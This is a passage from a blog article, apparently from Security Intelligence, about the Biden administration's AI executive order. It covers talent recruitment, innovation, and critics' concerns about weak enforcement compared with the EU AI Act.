This executive order places great emphasis on recruiting AI talent, ensuring America becomes the leading destination for the most skilled leaders in their field. From changes to visas and green cards to investments in resources, tools and infrastructure, there’s a clear focus on making America a leader in the AI revolution.

Promoting innovation and competition

Although the EO places potential restrictions on developers and companies alike, it encourages investment in the space. There is immense potential to democratize AI advancements, giving people and private companies more autonomy rather than relying on major tech companies. Moreover, with proper regulations, the government can drive more innovation with AI technology to prioritize societal benefits.

Explore AI solutions

What the executive order is missing

While there is a lot of optimism around this announcement from the Biden administration, there are skeptics. Senator Ted Cruz argues these guidelines place “barriers to innovation disguised as safety measures” and that the order “undermines exactly what AI technologies promise to do: create efficiencies, spur economic growth and improve our lives.”

It leads us to wonder what is missing and the potential obstacles the EO faces.

A Forrester senior analyst, Alla Valente, states, “We don’t need more ‘voluntary’ frameworks for regulating AI — we need clear direction and mandated requirements.”

Many analysts fear the EO will become nothing more than words that appear strong but have no practical merit. Lloyd Whitman echoes this sentiment: “An executive order can only do so much, limited by the existing authorities and appropriations of the executive branch agencies.”

Currently, the EO provides an alarming lack of repercussions to those who don’t follow the guidelines. There is also little clarity on how the rules will be enforced — especially compared to the European Union AI Act, which enforces significant fines for those failing to meet standards.

The first steps of a longer journey

As AI continues to advance, there’s a fine line for legislators to protect the people without stifling innovation. The jury is out on whether these guiding principles from the president will achieve this balance.

The consensus is that although this EO provides positive steps forward, it lacks enough detail to achieve its ambitious goals.

There’s no doubt that the exponential rise of AI is set to continue. But although it will lead to massive opportunities, this technology is an area that needs clear and significant regulation. The executive order from the Biden administration is the first meaningful step, although one that is very much a work in progress.

The post How the White House sees the future of safeguarding AI appeared first on Security Intelligence.

Security Intelligence – ​Read More